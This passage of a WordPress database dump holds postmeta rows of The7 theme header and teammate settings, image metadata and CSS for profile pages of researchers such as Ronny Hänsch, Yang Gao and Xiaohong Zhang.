(22818,3455,'_dt_fancy_header_responsive_font_size','30'),
(22819,3455,'_dt_fancy_header_responsive_title_line_height','38'),
(22820,3455,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(22821,3455,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(22822,3455,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(22823,3455,'_dt_teammate_options_go_to_single','1'),
(22824,3455,'_dt_teammate_options_position',''),
(22825,3455,'_dt_teammate_options_website',''),
(22826,3455,'_dt_teammate_options_mail',''),
(22827,3455,'_dt_teammate_options_facebook',''),
(22828,3455,'_dt_teammate_options_twitter',''),
(22829,3455,'_dt_teammate_options_dribbble',''),
(22830,3455,'_dt_teammate_options_you-tube',''),
(22831,3455,'_dt_teammate_options_rss',''),
(22832,3455,'_dt_teammate_options_delicious',''),
(22833,3455,'_dt_teammate_options_flickr',''),
(22834,3455,'_dt_teammate_options_lastfm',''),
(22835,3455,'_dt_teammate_options_linkedin',''),
(22836,3455,'_dt_teammate_options_vimeo',''),
(22837,3455,'_dt_teammate_options_tumbler',''),
(22838,3455,'_dt_teammate_options_pinterest',''),
(22839,3455,'_dt_teammate_options_devian',''),
(22840,3455,'_dt_teammate_options_skype',''),
(22841,3455,'_dt_teammate_options_github',''),
(22842,3455,'_dt_teammate_options_instagram',''),
(22843,3455,'_dt_teammate_options_stumbleupon',''),
(22844,3455,'_dt_teammate_options_behance',''),
(22845,3455,'_dt_teammate_options_px-500',''),
(22846,3455,'_dt_teammate_options_tripedvisor',''),
(22847,3455,'_dt_teammate_options_vk',''),
(22848,3455,'_dt_teammate_options_foursquare',''),
(22849,3455,'_dt_teammate_options_xing',''),
(22850,3455,'_dt_teammate_options_weibo',''),
(22851,3455,'_dt_teammate_options_odnoklassniki',''),
(22852,3455,'_dt_teammate_options_research-gate',''),
(22853,3455,'_dt_teammate_options_yelp',''),
(22854,3455,'_dt_teammate_options_blogger',''),
(22855,3455,'_dt_teammate_options_soundcloud',''),
(22856,3455,'_dt_teammate_options_viber',''),
(22857,3455,'_dt_teammate_options_whatsapp',''),
(22858,3455,'_dt_teammate_options_reddit',''),
(22859,3455,'_dt_teammate_options_snapchat',''),
(22860,3455,'_dt_teammate_options_telegram',''),
(22861,3455,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(22862,3456,'_edit_lock','1671198418:1'),
(22863,3457,'_wp_attached_file','2022/12/w252.jpg'),
(22864,3457,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:199;s:6:\"height\";i:256;s:4:\"file\";s:16:\"2022/12/w252.jpg\";s:8:\"filesize\";i:9636;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"w252-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4352;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(22865,3456,'_thumbnail_id','3457'),
(22866,3456,'_edit_last','1'),
(22867,3456,'_dt_sidebar_position','disabled'),
(22868,3456,'_dt_sidebar_widgetarea_id','sidebar_1'),
(22869,3456,'_dt_sidebar_hide_on_mobile','0'),
(22870,3456,'_dt_footer_show','1'),
(22871,3456,'_dt_footer_widgetarea_id','sidebar_2'),
(22872,3456,'_dt_footer_hide_on_mobile','0'),
(22873,3456,'_dt_header_title','fancy'),
(22874,3456,'_dt_header_background','normal'),
(22875,3456,'_dt_header_background_below_slideshow','disabled'),
(22876,3456,'_dt_header_transparent_bg_color_scheme','light'),
(22877,3456,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(22878,3456,'_dt_header_transparent_top_bar_bg_opacity','25'),
(22879,3456,'_dt_header_transparent_bg_color','#000000'),
(22880,3456,'_dt_header_transparent_bg_opacity','50'),
(22881,3456,'_dt_header_disabled_background','normal'),
(22882,3456,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(22883,3456,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(22884,3456,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(22885,3456,'_dt_header_disabled_transparent_bg_color','#000000'),
(22886,3456,'_dt_header_disabled_transparent_bg_opacity','50'),
(22887,3456,'_dt_page_overrides_top_margin',''),
(22888,3456,'_dt_page_overrides_right_margin',''),
(22889,3456,'_dt_page_overrides_bottom_margin',''),
(22890,3456,'_dt_page_overrides_left_margin',''),
(22891,3456,'_dt_mobile_page_padding_top',''),
(22892,3456,'_dt_mobile_page_padding_right',''),
(22893,3456,'_dt_mobile_page_padding_bottom',''),
(22894,3456,'_dt_mobile_page_padding_left',''),
(22895,3456,'_dt_fancy_header_layout_heading',''),
(22896,3456,'_dt_fancy_header_title_aligment','center'),
(22897,3456,'_dt_fancy_header_height','300'),
(22898,3456,'_dt_fancy_header_padding-top','0px'),
(22899,3456,'_dt_fancy_header_padding-bottom','0px'),
(22900,3456,'_dt_fancy_header_breadcrumbs_heading',''),
(22901,3456,'_dt_fancy_header_breadcrumbs','disabled'),
(22902,3456,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(22903,3456,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(22904,3456,'_dt_fancy_header_title_heading',''),
(22905,3456,'_dt_fancy_header_title_mode','custom'),
(22906,3456,'_dt_fancy_header_title','Ronny Hänsch'),
(22907,3456,'_dt_fancy_header_title_font_size','30'),
(22908,3456,'_dt_fancy_header_title_line_height','36'),
(22909,3456,'_dt_fancy_header_text_transform','none'),
(22910,3456,'_dt_fancy_header_title_color_mode','color'),
(22911,3456,'_dt_fancy_header_title_color','#ffffff'),
(22912,3456,'_dt_fancy_header_subtitle_heading',''),
(22913,3456,'_dt_fancy_header_subtitle','DLR Germany'),
(22914,3456,'_dt_fancy_header_subtitle_font_size','18'),
(22915,3456,'_dt_fancy_header_subtitle_line_height','26'),
(22916,3456,'_dt_fancy_header_subtitle_text_transform','none'),
(22917,3456,'_dt_fancy_header_subtitle_color_mode','color'),
(22918,3456,'_dt_fancy_header_subtitle_color','#ffffff'),
(22919,3456,'_dt_fancy_header_bg_heading',''),
(22920,3456,'_dt_fancy_header_bg_color','#222222'),
(22921,3456,'_dt_fancy_header_bg_image_origin','custom'),
(22922,3456,'_dt_fancy_header_bg_image','a:0:{}'),
(22923,3456,'_dt_fancy_header_bg_repeat','no-repeat'),
(22924,3456,'_dt_fancy_header_bg_position_x','center'),
(22925,3456,'_dt_fancy_header_bg_position_y','center'),
(22926,3456,'_dt_fancy_header_bg_fullscreen','1'),
(22927,3456,'_dt_fancy_header_bg_overlay','0'),
(22928,3456,'_dt_fancy_header_overlay_color','#000'),
(22929,3456,'_dt_fancy_header_bg_overlay_opacity','50'),
(22930,3456,'_dt_fancy_header_scroll_effect','default'),
(22931,3456,'_dt_fancy_header_bg_parallax','0.5'),
(22932,3456,'_dt_fancy_header_responsiveness_heading',''),
(22933,3456,'_dt_fancy_header_responsiveness','enabled'),
(22934,3456,'_dt_fancy_header_responsiveness_switch','778px'),
(22935,3456,'_dt_fancy_header_responsive_height','70'),
(22936,3456,'_dt_fancy_header_responsive_font_size','30'),
(22937,3456,'_dt_fancy_header_responsive_title_line_height','38'),
(22938,3456,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(22939,3456,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(22940,3456,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(22941,3456,'_dt_teammate_options_go_to_single','1'),
(22942,3456,'_dt_teammate_options_position',''),
(22943,3456,'_dt_teammate_options_website',''),
(22944,3456,'_dt_teammate_options_mail',''),
(22945,3456,'_dt_teammate_options_facebook',''),
(22946,3456,'_dt_teammate_options_twitter',''),
(22947,3456,'_dt_teammate_options_dribbble',''),
(22948,3456,'_dt_teammate_options_you-tube',''),
(22949,3456,'_dt_teammate_options_rss',''),
(22950,3456,'_dt_teammate_options_delicious',''),
(22951,3456,'_dt_teammate_options_flickr',''),
(22952,3456,'_dt_teammate_options_lastfm',''),
(22953,3456,'_dt_teammate_options_linkedin',''),
(22954,3456,'_dt_teammate_options_vimeo',''),
(22955,3456,'_dt_teammate_options_tumbler',''),
(22956,3456,'_dt_teammate_options_pinterest',''),
(22957,3456,'_dt_teammate_options_devian',''),
(22958,3456,'_dt_teammate_options_skype',''),
(22959,3456,'_dt_teammate_options_github',''),
(22960,3456,'_dt_teammate_options_instagram',''),
(22961,3456,'_dt_teammate_options_stumbleupon',''),
(22962,3456,'_dt_teammate_options_behance',''),
(22963,3456,'_dt_teammate_options_px-500',''),
(22964,3456,'_dt_teammate_options_tripedvisor',''),
(22965,3456,'_dt_teammate_options_vk',''),
(22966,3456,'_dt_teammate_options_foursquare',''),
(22967,3456,'_dt_teammate_options_xing',''),
(22968,3456,'_dt_teammate_options_weibo',''),
(22969,3456,'_dt_teammate_options_odnoklassniki',''),
(22970,3456,'_dt_teammate_options_research-gate',''),
(22971,3456,'_dt_teammate_options_yelp',''),
(22972,3456,'_dt_teammate_options_blogger',''),
(22973,3456,'_dt_teammate_options_soundcloud',''),
(22974,3456,'_dt_teammate_options_viber',''),
(22975,3456,'_dt_teammate_options_whatsapp',''),
(22976,3456,'_dt_teammate_options_reddit',''),
(22977,3456,'_dt_teammate_options_snapchat',''),
(22978,3456,'_dt_teammate_options_telegram',''),
(22979,3456,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(22980,3458,'_edit_lock','1671198508:1'),
(22981,3459,'_wp_attached_file','2022/12/w261.jpg'),
(22982,3459,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:256;s:6:\"height\";i:306;s:4:\"file\";s:16:\"2022/12/w261.jpg\";s:8:\"filesize\";i:23913;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"w261-251x300.jpg\";s:5:\"width\";i:251;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14781;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"w261-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5915;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(22983,3458,'_thumbnail_id','3459'),
(22984,3458,'_edit_last','1'),
(22985,3458,'_dt_sidebar_position','disabled'),
(22986,3458,'_dt_sidebar_widgetarea_id','sidebar_1'),
(22987,3458,'_dt_sidebar_hide_on_mobile','0'),
(22988,3458,'_dt_footer_show','1'),
(22989,3458,'_dt_footer_widgetarea_id','sidebar_2'),
(22990,3458,'_dt_footer_hide_on_mobile','0'),
(22991,3458,'_dt_header_title','fancy'),
(22992,3458,'_dt_header_background','normal'),
(22993,3458,'_dt_header_background_below_slideshow','disabled'),
(22994,3458,'_dt_header_transparent_bg_color_scheme','light'),
(22995,3458,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(22996,3458,'_dt_header_transparent_top_bar_bg_opacity','25'),
(22997,3458,'_dt_header_transparent_bg_color','#000000'),
(22998,3458,'_dt_header_transparent_bg_opacity','50'),
(22999,3458,'_dt_header_disabled_background','normal'),
(23000,3458,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(23001,3458,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(23002,3458,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(23003,3458,'_dt_header_disabled_transparent_bg_color','#000000'),
(23004,3458,'_dt_header_disabled_transparent_bg_opacity','50'),
(23005,3458,'_dt_page_overrides_top_margin',''),
(23006,3458,'_dt_page_overrides_right_margin',''),
(23007,3458,'_dt_page_overrides_bottom_margin',''),
(23008,3458,'_dt_page_overrides_left_margin',''),
(23009,3458,'_dt_mobile_page_padding_top',''),
(23010,3458,'_dt_mobile_page_padding_right',''),
(23011,3458,'_dt_mobile_page_padding_bottom',''),
(23012,3458,'_dt_mobile_page_padding_left',''),
(23013,3458,'_dt_fancy_header_layout_heading',''),
(23014,3458,'_dt_fancy_header_title_aligment','center'),
(23015,3458,'_dt_fancy_header_height','300'),
(23016,3458,'_dt_fancy_header_padding-top','0px'),
(23017,3458,'_dt_fancy_header_padding-bottom','0px'),
(23018,3458,'_dt_fancy_header_breadcrumbs_heading',''),
(23019,3458,'_dt_fancy_header_breadcrumbs','disabled'),
(23020,3458,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(23021,3458,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(23022,3458,'_dt_fancy_header_title_heading',''),
(23023,3458,'_dt_fancy_header_title_mode','custom'),
(23024,3458,'_dt_fancy_header_title','Yang Gao'),
(23025,3458,'_dt_fancy_header_title_font_size','30'),
(23026,3458,'_dt_fancy_header_title_line_height','36'),
(23027,3458,'_dt_fancy_header_text_transform','none'),
(23028,3458,'_dt_fancy_header_title_color_mode','color'),
(23029,3458,'_dt_fancy_header_title_color','#ffffff'),
(23030,3458,'_dt_fancy_header_subtitle_heading',''),
(23031,3458,'_dt_fancy_header_subtitle','University of Calgary, Canada'),
(23032,3458,'_dt_fancy_header_subtitle_font_size','18'),
(23033,3458,'_dt_fancy_header_subtitle_line_height','26'),
(23034,3458,'_dt_fancy_header_subtitle_text_transform','none'),
(23035,3458,'_dt_fancy_header_subtitle_color_mode','color'),
(23036,3458,'_dt_fancy_header_subtitle_color','#ffffff'),
(23037,3458,'_dt_fancy_header_bg_heading',''),
(23038,3458,'_dt_fancy_header_bg_color','#222222'),
(23039,3458,'_dt_fancy_header_bg_image_origin','custom'),
(23040,3458,'_dt_fancy_header_bg_image','a:0:{}'),
(23041,3458,'_dt_fancy_header_bg_repeat','no-repeat'),
(23042,3458,'_dt_fancy_header_bg_position_x','center'),
(23043,3458,'_dt_fancy_header_bg_position_y','center'),
(23044,3458,'_dt_fancy_header_bg_fullscreen','1'),
(23045,3458,'_dt_fancy_header_bg_overlay','0'),
(23046,3458,'_dt_fancy_header_overlay_color','#000'),
(23047,3458,'_dt_fancy_header_bg_overlay_opacity','50'),
(23048,3458,'_dt_fancy_header_scroll_effect','default'),
(23049,3458,'_dt_fancy_header_bg_parallax','0.5'),
(23050,3458,'_dt_fancy_header_responsiveness_heading',''),
(23051,3458,'_dt_fancy_header_responsiveness','disabled'),
(23052,3458,'_dt_fancy_header_responsiveness_switch','778px'),
(23053,3458,'_dt_fancy_header_responsive_height','70'),
(23054,3458,'_dt_fancy_header_responsive_font_size','30'),
(23055,3458,'_dt_fancy_header_responsive_title_line_height','38'),
(23056,3458,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(23057,3458,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(23058,3458,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(23059,3458,'_dt_teammate_options_go_to_single','1'),
(23060,3458,'_dt_teammate_options_position',''),
(23061,3458,'_dt_teammate_options_website',''),
(23062,3458,'_dt_teammate_options_mail',''),
(23063,3458,'_dt_teammate_options_facebook',''),
(23064,3458,'_dt_teammate_options_twitter',''),
(23065,3458,'_dt_teammate_options_dribbble',''),
(23066,3458,'_dt_teammate_options_you-tube',''),
(23067,3458,'_dt_teammate_options_rss',''),
(23068,3458,'_dt_teammate_options_delicious',''),
(23069,3458,'_dt_teammate_options_flickr',''),
(23070,3458,'_dt_teammate_options_lastfm',''),
(23071,3458,'_dt_teammate_options_linkedin',''),
(23072,3458,'_dt_teammate_options_vimeo',''),
(23073,3458,'_dt_teammate_options_tumbler',''),
(23074,3458,'_dt_teammate_options_pinterest',''),
(23075,3458,'_dt_teammate_options_devian',''),
(23076,3458,'_dt_teammate_options_skype',''),
(23077,3458,'_dt_teammate_options_github',''),
(23078,3458,'_dt_teammate_options_instagram',''),
(23079,3458,'_dt_teammate_options_stumbleupon',''),
(23080,3458,'_dt_teammate_options_behance',''),
(23081,3458,'_dt_teammate_options_px-500',''),
(23082,3458,'_dt_teammate_options_tripedvisor',''),
(23083,3458,'_dt_teammate_options_vk',''),
(23084,3458,'_dt_teammate_options_foursquare',''),
(23085,3458,'_dt_teammate_options_xing',''),
(23086,3458,'_dt_teammate_options_weibo',''),
(23087,3458,'_dt_teammate_options_odnoklassniki',''),
(23088,3458,'_dt_teammate_options_research-gate',''),
(23089,3458,'_dt_teammate_options_yelp',''),
(23090,3458,'_dt_teammate_options_blogger',''),
(23091,3458,'_dt_teammate_options_soundcloud',''),
(23092,3458,'_dt_teammate_options_viber',''),
(23093,3458,'_dt_teammate_options_whatsapp',''),
(23094,3458,'_dt_teammate_options_reddit',''),
(23095,3458,'_dt_teammate_options_snapchat',''),
(23096,3458,'_dt_teammate_options_telegram',''),
(23097,3458,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(23098,3460,'_edit_lock','1671198602:1'),
(23099,3461,'_wp_attached_file','2022/12/w262.jpg'),
(23100,3461,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:394;s:6:\"height\";i:431;s:4:\"file\";s:16:\"2022/12/w262.jpg\";s:8:\"filesize\";i:57099;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"w262-274x300.jpg\";s:5:\"width\";i:274;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17861;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"w262-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6487;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(23101,3460,'_thumbnail_id','3461'),
(23102,3460,'_edit_last','1'),
(23103,3460,'_dt_sidebar_position','disabled'),
(23104,3460,'_dt_sidebar_widgetarea_id','sidebar_1'),
(23105,3460,'_dt_sidebar_hide_on_mobile','0'),
(23106,3460,'_dt_footer_show','1'),
(23107,3460,'_dt_footer_widgetarea_id','sidebar_2'),
(23108,3460,'_dt_footer_hide_on_mobile','0'),
(23109,3460,'_dt_header_title','fancy'),
(23110,3460,'_dt_header_background','normal'),
(23111,3460,'_dt_header_background_below_slideshow','disabled'),
(23112,3460,'_dt_header_transparent_bg_color_scheme','light'),
(23113,3460,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(23114,3460,'_dt_header_transparent_top_bar_bg_opacity','25'),
(23115,3460,'_dt_header_transparent_bg_color','#000000'),
(23116,3460,'_dt_header_transparent_bg_opacity','50'),
(23117,3460,'_dt_header_disabled_background','normal'),
(23118,3460,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(23119,3460,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(23120,3460,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(23121,3460,'_dt_header_disabled_transparent_bg_color','#000000'),
(23122,3460,'_dt_header_disabled_transparent_bg_opacity','50'),
(23123,3460,'_dt_page_overrides_top_margin',''),
(23124,3460,'_dt_page_overrides_right_margin',''),
(23125,3460,'_dt_page_overrides_bottom_margin',''),
(23126,3460,'_dt_page_overrides_left_margin',''),
(23127,3460,'_dt_mobile_page_padding_top',''),
(23128,3460,'_dt_mobile_page_padding_right',''),
(23129,3460,'_dt_mobile_page_padding_bottom',''),
(23130,3460,'_dt_mobile_page_padding_left',''),
(23131,3460,'_dt_fancy_header_layout_heading',''),
(23132,3460,'_dt_fancy_header_title_aligment','center'),
(23133,3460,'_dt_fancy_header_height','300'),
(23134,3460,'_dt_fancy_header_padding-top','0px'),
(23135,3460,'_dt_fancy_header_padding-bottom','0px'),
(23136,3460,'_dt_fancy_header_breadcrumbs_heading',''),
(23137,3460,'_dt_fancy_header_breadcrumbs','disabled'),
(23138,3460,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(23139,3460,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(23140,3460,'_dt_fancy_header_title_heading',''),
(23141,3460,'_dt_fancy_header_title_mode','custom'),
(23142,3460,'_dt_fancy_header_title','Xiaohong Zhang'),
(23143,3460,'_dt_fancy_header_title_font_size','30'),
(23144,3460,'_dt_fancy_header_title_line_height','36'),
(23145,3460,'_dt_fancy_header_text_transform','none'),
(23146,3460,'_dt_fancy_header_title_color_mode','color'),
(23147,3460,'_dt_fancy_header_title_color','#ffffff'),
(23148,3460,'_dt_fancy_header_subtitle_heading',''),
(23149,3460,'_dt_fancy_header_subtitle','Wuhan University,  China'),
(23150,3460,'_dt_fancy_header_subtitle_font_size','18'),
(23151,3460,'_dt_fancy_header_subtitle_line_height','26'),
(23152,3460,'_dt_fancy_header_subtitle_text_transform','none'),
(23153,3460,'_dt_fancy_header_subtitle_color_mode','color'),
(23154,3460,'_dt_fancy_header_subtitle_color','#ffffff'),
(23155,3460,'_dt_fancy_header_bg_heading',''),
(23156,3460,'_dt_fancy_header_bg_color','#222222'),
(23157,3460,'_dt_fancy_header_bg_image_origin','custom'),
(23158,3460,'_dt_fancy_header_bg_image','a:0:{}'),
(23159,3460,'_dt_fancy_header_bg_repeat','no-repeat'),
(23160,3460,'_dt_fancy_header_bg_position_x','center'),
(23161,3460,'_dt_fancy_header_bg_position_y','center'),
(23162,3460,'_dt_fancy_header_bg_fullscreen','1'),
(23163,3460,'_dt_fancy_header_bg_overlay','0'),
(23164,3460,'_dt_fancy_header_overlay_color','#000'),
(23165,3460,'_dt_fancy_header_bg_overlay_opacity','50'),
(23166,3460,'_dt_fancy_header_scroll_effect','default'),
(23167,3460,'_dt_fancy_header_bg_parallax','0.5'),
(23168,3460,'_dt_fancy_header_responsiveness_heading',''),
(23169,3460,'_dt_fancy_header_responsiveness','enabled'),
(23170,3460,'_dt_fancy_header_responsiveness_switch','778px'),
(23171,3460,'_dt_fancy_header_responsive_height','70'),
(23172,3460,'_dt_fancy_header_responsive_font_size','30'),
(23173,3460,'_dt_fancy_header_responsive_title_line_height','38'),
(23174,3460,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(23175,3460,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(23176,3460,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(23177,3460,'_dt_teammate_options_go_to_single','1'),
(23178,3460,'_dt_teammate_options_position',''),
(23179,3460,'_dt_teammate_options_website',''),
(23180,3460,'_dt_teammate_options_mail',''),
(23181,3460,'_dt_teammate_options_facebook',''),
(23182,3460,'_dt_teammate_options_twitter',''),
(23183,3460,'_dt_teammate_options_dribbble',''),
(23184,3460,'_dt_teammate_options_you-tube',''),
(23185,3460,'_dt_teammate_options_rss',''),
(23186,3460,'_dt_teammate_options_delicious',''),
(23187,3460,'_dt_teammate_options_flickr',''),
(23188,3460,'_dt_teammate_options_lastfm',''),
